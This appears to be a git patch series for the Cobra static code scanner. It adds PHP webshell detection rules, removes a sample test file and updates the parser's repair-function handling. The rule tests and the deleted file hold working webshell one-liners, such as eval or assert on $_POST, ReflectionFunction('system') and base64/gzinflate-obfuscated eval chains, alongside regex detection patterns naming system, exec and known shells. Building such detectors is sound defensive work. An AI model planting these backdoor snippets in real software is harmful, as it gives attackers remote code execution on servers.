]]></case> + </test> + <solution> + ## 安全风险 + 代码中存在webshell + + ## 修复方案 + 删除 + </solution> + <status value="on"/> + <author name="Feei" email="feei@feei.cn"/> +</cobra> diff --git a/rules/CVI-360009.xml b/rules/CVI-360009.xml new file mode 100644 index 00000000..aa311c3e --- /dev/null +++ b/rules/CVI-360009.xml @@ -0,0 +1,22 @@ +<?xml version="1.0" encoding="UTF-8"?> +<cobra document="https://github.com/wufeifei/cobra"> + <name value="webshell9"/> + <language value="php"/> + <match mode="regex-only-match"><![CDATA[((new\s*SQLite3[\s\S]*->\s*createFunction)\s*\(+\s*.{1,100}|PDO::FETCH_FUNC\s*),\s*(['\"]\s*(eval|assert|ass\\x65rt|system|exec|shell_exec|passthru|popen|proc_open|pcntl_exec)\s*['\"]|(base64_decode|gzinflate|gzuncompress|gzdecode|str_rot13)[\s\(]+.{1,25}|(\$_(GET|POST|REQUEST|COOKIE).{0,25}))\s*\)]]></match> + <level value="7"/> + <test> + <case assert="true"><![CDATA[ + $db = new SQLite3('sqlite.db3'); + $db->createFunction('myfunc', $_POST['e']); + ]]></case> + </test> + <solution> + ## 安全风险 + 代码中存在webshell + + ## 修复方案 + 删除 + </solution> + <status value="on"/> + <author name="Feei" email="feei@feei.cn"/> +</cobra> diff --git a/rules/CVI-360010.xml b/rules/CVI-360010.xml index 2a5e05cb..274fff85 100644 --- a/rules/CVI-360010.xml +++ b/rules/CVI-360010.xml @@ -2,12 +2,17 @@ <cobra document="https://github.com/wufeifei/cobra"> <name value="webshell10"/> <language value="php"/> - <match mode="regex-only-match"><![CDATA[ - \$\s*(\w+)\s*=[\s\(\{]*((\$_(GET|POST|REQUEST|COOKIE).{0,25})|['\"]\s*(eval|assert|ass\\x65rt|system|exec|shell_exec|passthru|popen|proc_open|pcntl_exec|[^,;]*?\x|[^,;]*?['\"]\s*\.\s*['\"]))[\s\S]{0,1000}((array_filter|array_reduce|array_diff_ukey|array_udiff|array_walk|uasort|uksort|usort|new\s*SQLite3[\s\S]*->\s*createFunction)\s*\(+[^,]*\$[^,]*|PDO::FETCH_FUNC\s*),\s*(\$\s*\1\s*\)|((base64_decode|gzinflate|gzuncompress|gzdecode|str_rot13)[\s\(]*\$\s*\1)) - ]]></match> + <match mode="regex-only-match"><![CDATA[\$\s*(\w+)\s*=[\s\(\{]*((\$_(GET|POST|REQUEST|COOKIE).{0,25})|['\"]\s*(eval|assert|ass\\x65rt|system|exec|shell_exec|passthru|popen|proc_open|pcntl_exec|[^,;]*?\x|[^,;]*?['\"]\s*\.\s*['\"]))[\s\S]{0,1000}((new\s*SQLite3[\s\S]*->\s*createFunction)\s*\(+[^,]*(\$)?[^,]*|PDO::FETCH_FUNC\s*),\s*(\$\s*\1\s*\)|((base64_decode|gzinflate|gzuncompress|gzdecode|str_rot13)[\s\(]*\$\s*\1))]]></match> <level value="7"/> <test> - <case assert="true"><![CDATA[$e = $_REQUEST['e'];$arr = array($_POST['pass'],);array_filter($arr, base64_decode($e));]]></case> + <case assert="true"><![CDATA[ + $e = $_REQUEST['e']; + $db = new SQLite3('sqlite.db3'); + $db->createFunction('myfunc', $e); + $stmt = $db->prepare("SELECT myfunc(?)"); + $stmt->bindValue(1, $_REQUEST['pass'], SQLITE3_TEXT); + $stmt->execute(); + ]]></case> </test> <solution> ## 安全风险 diff --git a/rules/CVI-360037.xml b/rules/CVI-360037.xml new file mode 100644 index 00000000..db28b4e8 --- /dev/null +++ b/rules/CVI-360037.xml @@ -0,0 +1,22 @@ +<?xml version="1.0" encoding="UTF-8"?> +<cobra document="https://github.com/wufeifei/cobra"> + <name value="webshell2"/> + <language value="php"/> + <match mode="regex-only-match"><![CDATA[\s*\$\s*(\w+)\s*=[\s\(]*['\"](([^\n'\"]{1,1000}(\.(jpg|png|txt|jpeg|log|tmp|db|cache)|\_(tmp|log)))|((http|https|file|php|data|ftp)\://.{0,100}))[\s\S]{0,1000}(include|require)(_once)?[\s\(]\$\1]]></match> + <level value="7"/> + <test> + <case assert="true"><![CDATA[ + $a="http://www.test.com/sss.php"; + require_once $a; + ]]></case> + </test> + <solution> + ## 安全风险 + 代码中存在webshell + + ## 修复方案 + 删除 + </solution> + <status value="on"/> + <author name="Feei" email="feei@feei.cn"/> +</cobra> diff --git a/tests/vulnerabilities/webshell.php b/tests/vulnerabilities/webshell.php deleted file mode 100644 index ec485001..00000000 --- a/tests/vulnerabilities/webshell.php +++ /dev/null @@ -1,150 +0,0 @@ - - -//cvi-360002 -include "sss.jpg"; -include("sss_tmp"); -require_once "http://www.test.com/sss.php"; - -//扫不出来.... -$a="http://www.test.com/sss.php"; -require_once $a; - -///////////// - -//cvi-360004 -$string = 'AABBCCDDEE'; -preg_replace($_POST['A'], $_POST['B'], $string); - -$user =$_GET['user'];preg_replace(chr(101),exec('whoami'),"aaaa"); - -$b4dboy = $_POST['b4dboy']) && @preg_replace('/ad/e','@'.str_rot13('riny').'($b4dboy)', 'add'; - -//cvi-360006 换行就挂 -$b = $_POST['B']; preg_replace($_POST['A'], $b, $string); - -///////////// - -//cvi-360007 -$func = new ReflectionFunction($_GET[m]); -echo $func->invokeArgs(array($_GET[c],$_GET[id])); - - - -//cvi-360008 - -//cvi-360009 -$e = $_REQUEST['e'];$arr = array($_POST['pass'],);array_filter($arr, base64_decode($e)); - -$ee = "eval()";array_filter($a, base64_decode($ee)); - -//cvi-360011 换行就挂 -$newfunc = create_function(null,'assert($cmd);');$newfunc(); - -//cvi-360012 换行就挂 -$newfunc = create_function('str','return str'); -$newfunc("$_POST['c']"); - -//cvi-360013 换行就挂的那种 -$fun = $_POST['fun'];$ newfunc = create_function('str',$fun); - -//cvi-360014 换行就挂的那种 -$a="eval(";$a($_GET['a']); - - -//cvi-360015 -if ($dbhandle = sqlite_open('mysqlitedb', 0666, $sqliteerror)) { - sqlite_create_function($dbhandle, 'func', 'eval($cmd);', 1); -} else { - echo 'Error opening sqlite db: ' . $sqliteerror; - exit; -} - - -//cvi-360016 -filter_var_array(array('test' => $_REQUEST['pass']), array('test' => array('filter' => FILTER_CALLBACK, 'options' => 'assert'))); -//cvi-360017 换行挂 -$op=array('options' => 'assert'); -filter_var($_REQUEST['pass'], FILTER_CALLBACK, $op); - -//cvi-360018 一句话 -mb_ereg_replace('.*', $_REQUEST['op'], '', 'e'); -//cvi-360019 换行挂 -$e = "\ise"; -$data = mb_ereg_replace("/[^A-Za-z0-9\.\-]/","",$data,$e); - - -//cvi-360020 -array_walk($array,$_POST['func']); - -//cvi-360021 换行挂 - - -//cvi-360016 -filter_var_array(array('test' => $_REQUEST['pass']), array('test' => array('filter' => FILTER_CALLBACK, 'options' => 'assert'))); -//cvi-360017 -$op=array('options' => 'assert'); -filter_var($_REQUEST['pass'], FILTER_CALLBACK, $op); - -//cvi-360018 -mb_ereg_replace('.*', $_REQUEST['op'], '', 'e'); -//cvi-360019 -$e = "\ise"; -$data = mb_ereg_replace("/[^A-Za-z0-9\.\-]/","",$data,$e); - -//cvi-360022 -ini_set('allow_url_include, 1'); // Allow url inclusion in this script -include('php://input'); - -//cvi-360023 特征值 -GIF87a<?php -BM<?php - -//cvi-360024 这什么玩意 -$f=$c('',$d);$f(); - -//cvi-360025 mdzz匹配不上 -$k = str_replace("8","","a8s88s8e8r88t");$k($_POST["8"]); - - -$mt="mFsKCleRfU"; -$ojj="IEBleldle"; -$hsa="E9TVFsnd2VuJ10p"; -$fnx="Ow=="; -$zk = str_replace("d","","sdtdrd_redpdldadcde"); -$ef = $zk("z", "", "zbazsze64_zdzeczodze"); -$dva = $zk("p","","pcprpepaptpe_fpupnpcptpipopn"); -$zvm = $dva('', $ef($zk("le", "", $ojj.$mt.$hsa.$fnx))); -//分解步骤 -//$zvm=create_function(base64_decode(str_replace("le","","IEBleldlemFsKCleRfUE9TVFsnd2VuJ10pOw=="))) //拼接后的语句 -//$zvm=create_function(base64_decode(IEBldmFsKCRfUE9TVFsnd2VuJ10pOw==))) //执行完str_replace函数后,返回base64加密后的字符串 -//$zvm=create_function(@eval($_POST['wen'])); //执行完base64_decode 得到解密后的字符串 得到一句话木马 密码是wen -$zvm(); //执行 - - -//cvi-360023 -GIF87a<?php -BM<?php - -//cvi-360026 -$cb= 'system'; -ob_start($cb); -echo $_GET[c]; -ob_end_flush(); - -$evalstr=""; -ob_start(function ($c,$d){global $evalstr;$evalstr=$c;}); -echo $_REQUEST['pass']; -ob_end_flush(); -assert($evalstr); - -ob_start(function ($c,$d){register_shutdown_function('assert',$c);}); -echo $_REQUEST['pass']; -ob_end_flush(); - -//cvi-360028 -eval(base64_decode(ZXZhbChiYXNlNjRfZGVjb2RlKFpYWmhiQ2hpWVhObE5qUmZaR1ZqYjJSbEtFeDVPRGhRTTBKdlkwRndiR1J0Um5OTFExSm1WVVU1VkZaR2RHdGlNamw1V0ZOclMweDVPQzVqYUhJb05EY3BMbEJuS1NrNykpOw)); -eval(gzinflate(base64_decode('s7ezsS/IKFBwSC1LzNFQiQ/wDw6JVlcpL9a1CyrNU4/VtE7OyM1PUQBKBbsGhbkGRSsFOwd5BoTEu3n6uPo5+roqxeoYmJiYaFrbA40CAA=='))); - -//cvi-360034 -$_POST['sa']($_POST['sb']); -?> From 6c2b6e7ac7a5fbf5822fefee5d04b9c02fe16733 Mon Sep 17 00:00:00 2001 From: braveghz <braveghz@gmail.com> Date: Thu, 7 Sep 2017 15:34:40 +0800 Subject: [PATCH 19/29] improve rules --- rules/CVI-180001.xml | 2 +- rules/CVI-180002.xml | 22 ---------------------- rules/CVI-220001.xml | 33 --------------------------------- rules/CVI-260001.xml | 2 -- rules/CVI-350002.xml | 24 ------------------------ rules/CVI-360011.xml | 20 ++++++++++++++++++++ rules/CVI-360013.xml | 4 +--- rules/CVI-360022.xml | 2 +- rules/CVI-360028.xml | 3 +++ rules/CVI-360031.xml | 14 ++++++++++++++ rules/CVI-360032.xml | 8 ++++++++ rules/CVI-360033.xml | 29 ++++++++++++++++++++++++++++- rules/CVI-360035.xml | 35 +++++++++++++++++++++++++++++++++++ rules/CVI-360036.xml | 23 +++++++++++++++++++++++ rules/vulnerabilities.xml | 1 + 15 files changed, 135 insertions(+), 87 deletions(-) delete mode 100644 rules/CVI-180002.xml delete mode 100644 rules/CVI-220001.xml delete mode 100644 rules/CVI-350002.xml create mode 100644 rules/CVI-360011.xml create mode 100644 rules/CVI-360035.xml create mode 100644 rules/CVI-360036.xml diff --git a/rules/CVI-180001.xml b/rules/CVI-180001.xml index 4b0969cb..5fdcee4c 100644 --- a/rules/CVI-180001.xml +++ b/rules/CVI-180001.xml @@ -2,7 +2,7 @@ <cobra document="https://github.com/wufeifei/cobra"> <name value="远程代码执行"/> <language value="php"/> - <match mode="function-param-controllable"><![CDATA[(array_map|create_function|call_user_func|call_user_func_array|assert|eval|dl|register_tick_function|register_shutdown_function|preg_replace)]]></match> + <match mode="function-param-controllable"><![CDATA[(array_map|create_function|call_user_func|call_user_func_array|assert|eval|dl|register_tick_function|register_shutdown_function|array_filter|array_reduce|array_diff_ukey|array_udiff|array_walk|uasort|uksort|usort)]]></match> <level value="10"/> <test> <case assert="true"><![CDATA[array_map($_GET['pass'],$array);]]></case> diff --git a/rules/CVI-180002.xml b/rules/CVI-180002.xml deleted file mode 100644 index 28036b9c..00000000 --- a/rules/CVI-180002.xml +++ /dev/null @@ -1,22 +0,0 @@ -<?xml version="1.0" encoding="UTF-8"?> -<cobra document="https://github.com/wufeifei/cobra"> - <name value="$func$"/> - <language value="php"/> - <match mode="regex-only-match"><![CDATA[\b^.*`.*`.*$]]></match> - <level value="6"/> - <test> - <case assert="true"><![CDATA[ - $output = `ls -al`; - echo "<pre>$output</pre>"; - ]]></case> - - </test> - <solution> - ## 安全风险 - 远程代码执行 - - ## 修复方案 - </solution> - <status value="on"/> - <author name="Feei" email="feei@feei.cn"/> -</cobra> \ No newline at end of file diff --git a/rules/CVI-220001.xml b/rules/CVI-220001.xml deleted file mode 100644 index a135d6a2..00000000 --- a/rules/CVI-220001.xml +++ /dev/null @@ -1,33 +0,0 @@ -<?xml version="1.0" encoding="UTF-8"?> -<cobra document="https://github.com/wufeifei/cobra"> - <name value="HRS(CRLF)"/> - <language value="php"/> - <match mode="function-param-controllable"><![CDATA[header]]></match> - <repair block="in-function-up"><![CDATA[in_array\s*\(\s*{{PARAM}}\s*,]]></repair> - <level value="5"/> - <test> - <case assert="true"><![CDATA[header("Location: ".$_GET["url"]);]]></case> - </test> - <solution> - ## 安全风险 - CRLF是"回车+换行"(\r\n)的简称。在HTTP协议中,HTTP Header与HTTP Body是用两个CRLF分隔的,浏览器根据这两个CRLF来取出HTTP内容并显示出来。 - 所以,一旦能够控制HTTP消息头中的字符,注入一些恶意的换行,就能注入一些会话Cookie或者HTML代码,所以CRLF Injection又叫HTTP Response Splitting. - CRLF Injection (CRLF注入) / HTTP Response Splitting(HRS) - - ## 修复方案 - 使用白名单判断 - - ## 代码示例 - - `<?php header("Location: ".$_GET["url"]); ?>` 构造 - `/index.php?url=a%0a%0dContent-Type:%20text/html%0a%0d%0a%0d<script>alert(1)</script>`发生注入 - - 修复方法:设置白名单,限制输入的URL - ```php - <?php if(!in_array($_GET["url"], $whitelist)) exit; ?> - ``` - </solution> - - <status value="on"/> - <author name="Feei" email="feei@feei.cn"/> -</cobra> \ No newline at end of file diff --git a/rules/CVI-260001.xml b/rules/CVI-260001.xml index 3f6f06de..9ca64e81 100644 --- a/rules/CVI-260001.xml +++ b/rules/CVI-260001.xml @@ -6,10 +6,8 @@ <level value="5"/> <test> <case assert="true"><![CDATA[ - <?php $test = $_POST['test']; $test_uns = unserialize($test); - ?> ]]></case> </test> <solution> diff --git a/rules/CVI-350002.xml b/rules/CVI-350002.xml deleted file mode 100644 index 0b22d73c..00000000 --- a/rules/CVI-350002.xml +++ /dev/null @@ -1,24 +0,0 @@ -<?xml version="1.0" encoding="UTF-8"?> -<cobra document="https://github.com/wufeifei/cobra"> - <name value="Redis匿名访问"/> - <language value="php"/> - <match mode="regex-only-match"><![CDATA[\-\>connect\((['\"]\w+\.[\w\.]+?['\"]\s*,)\s*(\d+)[\),]]]></match> - <level value="4"/> - <test> - <case assert="true"><![CDATA[ - $redis = new Redis(); - $redis->connect('192.168.1.2', 6379); - $redis->auth('passwd123!#'); - $redis->set('key','SS'); - ]]></case> - </test> - <solution> - ## 安全风险 - Redis匿名访问 - - ## 修复方案 - 禁止使用匿名方式访问 - </solution> - <status value="on"/> - <author name="H4rdy" email="with.h4rdy@gmail.com"/> -</cobra> \ No newline at end of file diff --git a/rules/CVI-360011.xml b/rules/CVI-360011.xml new file mode 100644 index 00000000..d3aff203 --- /dev/null +++ b/rules/CVI-360011.xml @@ -0,0 +1,20 @@ +<?xml version="1.0" encoding="UTF-8"?> +<cobra document="https://github.com/wufeifei/cobra"> + <name value="webshell11"/> + <language value="php"/> + <match mode="regex-only-match"><![CDATA[\$(\w*)\s*=\s*create_function\s*\(+\s*[^;\n\r\)]{1,100},\s*(['\"]\s*[^;\n\r\)]{0,100}(eval|assert|ass\\x65rt|system|exec|shell_exec|passthru|popen|poc_open|pcntl_exec).{1,600}\s*['\"]|[^,\n\r\)]{0,100}file_get_contents.{1,})\s*\)[\s\S]+\$\1\s*\([^\)]*\)]]></match> + <level value="7"/> + <test> + <case assert="true"><![CDATA[$sa = create_function('xxx', "eval($_POST['sb']");$sa();]]></case> + </test> + <solution> + ## 安全风险 + 代码中存在webshell + + ## 修复方案 + 删除 + </solution> + <status value="on"/> + <author name="Feei" email="feei@feei.cn"/> +</cobra> + diff --git a/rules/CVI-360013.xml b/rules/CVI-360013.xml index a8c0f7e6..5f186e6e 100644 --- a/rules/CVI-360013.xml +++ b/rules/CVI-360013.xml @@ -2,9 +2,7 @@ <cobra document="https://github.com/wufeifei/cobra"> <name value="webshell13"/> <language value="php"/> - <match mode="regex-only-match"><![CDATA[ - \$\s*(\w+)\s*=[\s\(\{]*((\$_(GET|POST|REQUEST|COOKIE|SERVER).{0,25})|['\"]\s*.{0,100}(eval|assert|ass\\x65rt|system|exec|shell_exec|passthru|popen|proc_open|pcntl_exec).{1,100}\s*['\"]|file_get_contents)[\s\S]{0,200}create_function\s*\(+[^,]{1,100},['\"\s]*(\$\s*\1['\"\s]*\)|((base64_decode|gzinflate|gzuncompress|gzdecode|str_rot13)[\s\(]*\$\s*\1)) - ]]></match> + <match mode="regex-only-match"><![CDATA[\$\s*(\w+)\s*=[\s\(\{]*(['\"]\s*.{0,100}(eval|assert|ass\\x65rt|system|exec|shell_exec|passthru|popen|proc_open|pcntl_exec).{1,100}\s*['\"]|file_get_contents)[\s\S]{0,200}create_function\s*\(+[^,]{1,100},['\"\s]*(\$\s*\1['\"\s]*\)|((base64_decode|gzinflate|gzuncompress|gzdecode|str_rot13)[\s\(]*\$\s*\1))]]></match> <level value="7"/> <test> <case assert="true"><![CDATA[]]></case> diff --git a/rules/CVI-360022.xml b/rules/CVI-360022.xml index 7e110ed8..c5bf35b3 100644 --- a/rules/CVI-360022.xml +++ b/rules/CVI-360022.xml @@ -2,7 +2,7 @@ <cobra document="https://github.com/wufeifei/cobra"> <name value="webshell22"/> <language value="php"/> - <match mode="regex-only-match"><![CDATA[\b(assert|eval|system|exec|shell_exec|passthru|popen|proc_open|pcntl_exec|include)(\b\s)*\(\s*(file_get_contents\s*\(\s*)?['\"]php://input]]></match> + <match mode="regex-only-match"><![CDATA[\s*(assert|eval|system|exec|shell_exec|passthru|popen|proc_open|pcntl_exec|include)\s*\(\s*(file_get_contents\s*\(\s*)?['\"]php://input]]></match> <level value="7"/> <test> <case assert="true"><![CDATA[ diff --git a/rules/CVI-360028.xml b/rules/CVI-360028.xml index ee59faee..62c80c0d 100644 --- a/rules/CVI-360028.xml +++ b/rules/CVI-360028.xml @@ -6,6 +6,9 @@ <level value="7"/> <test> <case assert="true"><![CDATA[eval(base64_decode(ZXZhbChiYXNlNjRfZGVjb2RlKFpYWmhiQ2hpWVhObE5qUmZaR1ZqYjJSbEtFeDVPRGhRTTBKdlkwRndiR1J0Um5OTFExSm1WVVU1VkZaR2RHdGlNamw1V0ZOclMweDVPQzVqYUhJb05EY3BMbEJuS1NrNykpOw));]]></case> + <case assert="true"><![CDATA[ + eval(gzinflate(base64_decode('s7ezsS/IKFBwSC1LzNFQiQ/wDw6JVlcpL9a1CyrNU4/VtE7OyM1PUQBKBbsGhbkGRSsFOwd5BoTEu3n6uPo5+roqxeoYmJiYaFrbA40CAA=='))); + ]]></case> </test> <solution> ## 安全风险 diff --git a/rules/CVI-360031.xml b/rules/CVI-360031.xml index 2b43470f..779dd9f7 100644 --- a/rules/CVI-360031.xml +++ b/rules/CVI-360031.xml @@ -4,10 +4,24 @@ <language value="php"/> <match mode="regex-only-match"><![CDATA[ini_get\s*\(\s*\"disable_functions\"\s*\)|\d\s*=>\s*array\s*\(\s*['\"]\s*pipe\s*['\"]|gzuncompress\(base64_decode\(|crypt\(\$_SERVER\['HTTP_H0ST'\],\d+\)==|if\(file_exists\(\$settings\['STOPFILE'\]\)\)]]></match> <level value="7"/> + <test> + <case assert="true"><![CDATA[ + function zWM($NXlKO){ + $NXlKO=gzuncompress(base64_decode($NXlKO)); + for($i=0;$i<strlen($NXlKO);$i++){ + $NXlKO[$i] = chr(ord($NXlKO[$i])-1); + } + return $NXlKO; + } + ]]></case> + </test> <solution> ## 安全风险 代码中存在webshell + 特征 `gzuncompress\(base64_decode` 对应webshell样例 + [link](https://github.com/tennc/webshell/blob/4ca96011884b892ec15de130f76eb2a047b77493/php/BNKQbAKQ.txt) + ## 修复方案 删除 </solution> diff --git a/rules/CVI-360032.xml b/rules/CVI-360032.xml index 5a32e9df..cf5f9d23 100644 --- a/rules/CVI-360032.xml +++ b/rules/CVI-360032.xml @@ -4,10 +4,18 @@ <language value="php"/> <match mode="regex-only-match"><![CDATA[\$nofuncs='no\s*exec\s*functions|udf\.dll|\$b374k|POWER-BY\s*WWW.XXDDOS.COM|<title>Safes\s*Mode\s*Shell|Siyanur\.PHP\s*|c999shexit\(\)|\$c99sh_|c99_sess_put\(|Coded\s*by\s*cyb3r|cyb3r_getupdate\(|coded\s*by\s*tjomi4|john\.barker446@gmail\.com|eval\(\"\\\$x=gzin\"|eval\(\"\?>\"\.gzinflate\(base64_decode\(|eval\(gzinflate\(base64_decode\(|eval\(gzuncompress\(base64_decode\(|eval\(gzinflate\(str_rot13\(base64_decode\(|function_exists\(\"zigetwar_buff_prepare\"\)|dQ99shell|r57shell|c99shell|lama's'hell\s*v|Carbylamine\s*PHP\s*Encoder|Safe\s*Mode\s*Shell|\$dI3h=\${'_REQUEST'};|new\s*COM\(\"IIS://localhost/w3svc\"\)|n57http-based\[\s*-\]terminal|Dosya\s*Olu|errorlog\(\"BACKEND:\s*startReDuh,|form\s*name=sh311Form|PHPJackal
|Reddragonfly's\s*WebShell|\(\"system\"==\$seletefunc\)\?system\(\$shellcmd\)|eNrsvGmT40iSKPZ5xmz|CrystalShell\s*v\.|Special\s*99\s*Shell|Simple\s*PHP\s*Mysql\s*client|'_de'\.'code'|phpsocks5_encrypt\(|define\('PHPSHELL_VERSION',|ZXZhbCgkX1BPU1RbMV0p|\$__H_H\(\$__C_C"]]> + +

'.sh_name().'

.: r57.biz Dq99Shell :. + ]]> + ## 安全风险 代码中存在webshell + 特征 `dQ99shell` 对应webshell样例 + [link](https://github.com/tennc/webshell/blob/4ca96011884b892ec15de130f76eb2a047b77493/www-7jyewu-cn/%E5%9B%BD%E5%A4%96%E5%85%8D%E6%9D%80PHP%E5%A4%A7%E9%A9%AC_%E6%9C%AA%E7%BF%BB%E8%AF%91.php) + ## 修复方案 删除 diff --git a/rules/CVI-360033.xml b/rules/CVI-360033.xml index 9f77cf83..14ae5598 100644 --- a/rules/CVI-360033.xml +++ b/rules/CVI-360033.xml @@ -1,13 +1,40 @@ - + |define\('envlpass',|KingDefacer_getupdate\(|relative2absolute\(|Host:\s*old.zone-h.org|

PHPKonsole

|\$_SESSION\['hassubdirs'\]\[\$treeroot\]|strtolower\(\$cmd\)\s*==\s*\"canirun\"|\$shell\s*=\s*'uname\s*-a;\s*w;\s*id;|Avrasya\s*Veri\s*ve\s*NetWork|

Linux Shells

|\$MyShellVersion\s*=\s*\"MyShell|PHP\s*Shell\s*[^\n\r]*|\$OOO000000=urldecode|1MSSYowqjzlVVAwAoHHFXzQ5Lc|'xiaoqiwangluo'|EqQC1FhyXxpEi7l2g\+yNjW62S|\$_uU\(83\)\.\$_uU\(84\)|7kyJ7kSKioDTWVWeRB3TiciL1UjcmRiLn4SKiAETs90cuZlTz5mROtHWHdWfRt0ZupmVRNTU2Y2MVZkT8|\s*ARS\s*Terminator\s*Shell|base64_decode\(\"R0lGODdhEgASAKEAAO7u7gAAAJmZmQAAACwAAA|\\x50\\x4b\\x03\\x04\\x0a\\x00\\x00\\x00\\x00|'W3D\s*Shell|\$back_connect=\"IyEvdXNyL2Jpbi9wZXJsD]]></match> <level value="7"/> + <test> + <case assert="true"><![CDATA[ + $shver = "Emp3ror Undetectable #18"; //Current version + //CONFIGURATION AND SETTINGS + if (!empty($unset_surl)) {setcookie("N3tsh_surl"); $surl = "";} + elseif (!empty($set_surl)) {$surl = $set_surl; setcookie("N3tsh_surl",$surl);} + else {$surl = $_REQUEST["N3tsh_surl"]; //Set this cookie for manual SURL + } + ]]></case> + <case assert="true"><![CDATA[ + function Tihuan_Auto($tp,$tt,$th,$tca,$tcb,$td,$tb) + { + if(($h_d = @opendir($tp)) == NULL) return false; + while(false !== ($Filename = @readdir($h_d))) + .... + } + ]]></case> + </test> <solution> ## 安全风险 代码中存在webshell + 特征 `setcookie("N3tsh_surl");` 对应webshell样例 + [link](https://github.com/tennc/webshell/blob/e2fd7eed0ca27430af65862bdcefd4bc268805f2/web-malware-collection-13-06-2012/PHP/c99.txt) + + 特征 `function Tihuan_Auto` 对应webshell样例 + [link](https://github.com/tennc/webshell/blob/4ca96011884b892ec15de130f76eb2a047b77493/php/ghost_source.php) + + 特征 `http://www.7jyewu.cn/` 对应webshell样例 + [link](https://github.com/tennc/webshell/blob/4ca96011884b892ec15de130f76eb2a047b77493/www-7jyewu-cn/DOC_ZIBSZXBIEG.php) + ## 修复方案 删除 </solution> diff --git a/rules/CVI-360035.xml b/rules/CVI-360035.xml new file mode 100644 index 00000000..9ac1a218 --- /dev/null +++ b/rules/CVI-360035.xml @@ -0,0 +1,35 @@ +<?xml version="1.0" encoding="UTF-8"?> +<cobra document="https://github.com/wufeifei/cobra"> + <name value="webshell35"/> + <language value="php"/> + <match mode="regex-only-match"><![CDATA[(new\s*ReflectionFunction|new\s*ArrayObject[\s\S]*->u[ak]sort)\s*\(+\s*(['\"]\s*(eval|assert|ass\\x65rt|system|exec|shell_exec|passthru|popen|proc_open|pcntl_exec|[^'\"]*\x).{0,200}|(\$_(GET|POST|REQUEST|COOKIE)\[[^,;\)]{0,250}\)))]]></match> + <level value="7"/> + <test> + <case assert="true"><![CDATA[ + $arr = new ArrayObject(array('test', $_REQUEST['pass'])); + $arr->uasort('assert'); + ]]></case> + <case assert="true"><![CDATA[ + $arr = new ArrayObject(array('test' => 1, $_REQUEST['pass'] => 2)); + $arr->uksort('assert'); + ]]></case> + <case assert="true"><![CDATA[ + $func = new ReflectionFunction("system"); + echo $func->invokeArgs(array("$_GET[c]")); + ]]></case> + <case assert="true"><![CDATA[ + $func = new ReflectionFunction($_GET[m]); + echo $func->invokeArgs(array($_GET[c],$_GET[id])); + ]]></case> + </test> + <solution> + ## 安全风险 + 代码中存在webshell + [webshell样例](https://github.com/tennc/webshell/blob/master/php/p2j/PHP%20reflection.php.txt) + + ## 修复方案 + 删除 + </solution> + <status value="on"/> + <author name="Feei" email="feei@feei.cn"/> +</cobra> \ No newline at end of file diff --git a/rules/CVI-360036.xml b/rules/CVI-360036.xml new file mode 100644 index 00000000..890ad34d --- /dev/null +++ b/rules/CVI-360036.xml @@ -0,0 +1,23 @@ +<?xml version="1.0" encoding="UTF-8"?> +<cobra document="https://github.com/wufeifei/cobra"> + <name value="webshell36"/> + <language value="php"/> + <match mode="regex-only-match"><![CDATA[\$\s*(\w+)\s*=[\s\(\{]*((\$_(GET|POST|REQUEST|COOKIE|SERVER).{0,25})|['\"]\s*(eval|assert|ass\\x65rt|system|exec|shell_exec|passthru|popen|proc_open|pcntl_exec))[\s\S]{0,200}\b(new\s*ReflectionFunction|new\s*ArrayObject[\s\S]*->u[ak]sort)\b\s*\(+\s*(\$\s*\1|((base64_decode|gzinflate|gzuncompress|gzdecode|str_rot13)[\s\(]*\$\s*\1))]]></match> + <level value="7"/> + <test> + <case assert="true"><![CDATA[ + $a = 'assert'; + $arr = new ArrayObject(array('test', $_REQUEST['pass'])); + $arr->uasort($a); + ]]></case> + </test> + <solution> + ## 安全风险 + 代码中存在webshell + + ## 修复方案 + 删除 + </solution> + <status value="on"/> + <author name="Feei" email="feei@feei.cn"/> +</cobra> diff --git a/rules/vulnerabilities.xml b/rules/vulnerabilities.xml index 898bda23..8223c674 100644 --- a/rules/vulnerabilities.xml +++ b/rules/vulnerabilities.xml @@ -24,6 +24,7 @@ <vulnerability name="VO" vid="320"/> <vulnerability name="WF" vid="350"/> <vulnerability name="WE" vid="355"/> + <vulnerability name="WS" vid="360"/> <vulnerability name="AV" vid="970"/> <vulnerability name="IV" vid="980"/> <vulnerability name="IC" vid="999"/> From 78025ad2bcb0802722dde75c878790a35c9fe810 Mon Sep 17 00:00:00 2001 From: BlBana <635373043@qq.com> Date: Thu, 7 Sep 2017 16:07:48 +0800 Subject: [PATCH 20/29] FPC-Mode vuls repair, fixed #559 --- cobra/engine.py | 5 +++-- cobra/parser.py | 12 +++++++++--- 2 files changed, 12 insertions(+), 5 deletions(-) diff --git a/cobra/engine.py b/cobra/engine.py index 4aae64e7..84caa107 100644 --- a/cobra/engine.py +++ b/cobra/engine.py @@ -621,12 +621,13 @@ def scan(self): try: ast = CAST(self.rule_match, self.target_directory, self.file_path, self.line_number, self.code_content) if self.rule_match_mode == const.mm_function_param_controllable: - rule_match = self.rule_match.strip('()').split('|') + rule_match = self.rule_match.strip('()').split('|') # 漏洞规则整理为列表 + rule_repair = self.rule_repair.strip('()').split('|') # 修复规则整理为列表 logger.debug('[RULE_MATCH] {r}'.format(r=rule_match)) try: with open(self.file_path, 'r') as fi: code_contents = fi.read() - result = scan_parser(code_contents, rule_match, self.line_number) + result = scan_parser(code_contents, rule_match, self.line_number, rule_repair) logger.debug('[AST] [RET] {c}'.format(c=result)) if len(result) > 0: if result[0]['code'] == 1: # 函数参数可控 diff --git a/cobra/parser.py b/cobra/parser.py index f3dc3db3..39c0f04a 100644 --- a/cobra/parser.py +++ b/cobra/parser.py @@ -18,6 +18,7 @@ with_line = True scan_results = [] # 结果存放列表初始化 +repairs = [] # 用于存放修复函数 def export(items): @@ -213,8 +214,10 @@ def is_repair(expr): :return: """ is_re = False # 是否修复,默认值是未修复 - if expr == 'escapeshellcmd': - is_re = True + for repair in repairs: + if expr == repair: + is_re = True + return is_re return is_re @@ -661,16 +664,19 @@ def analysis(nodes, vul_function, back_node, vul_lineo, function_params=None): back_node.append(node) -def scan_parser(code_content, sensitive_func, vul_lineno): +def scan_parser(code_content, sensitive_func, vul_lineno, repair): """ 开始检测函数 :param code_content: 要检测的文件内容 :param sensitive_func: 要检测的敏感函数,传入的为函数列表 :param vul_lineno: 漏洞函数所在行号 + :param repair: 对应漏洞的修复函数列表 :return: """ try: + global repairs global scan_results + repairs = repair scan_results = [] parser = make_parser() all_nodes = parser.parse(code_content, debug=False, lexer=lexer.clone(), tracking=with_line) From c3fec5e6d13ce4bab40d6be7c6d823d06e4903b9 Mon Sep 17 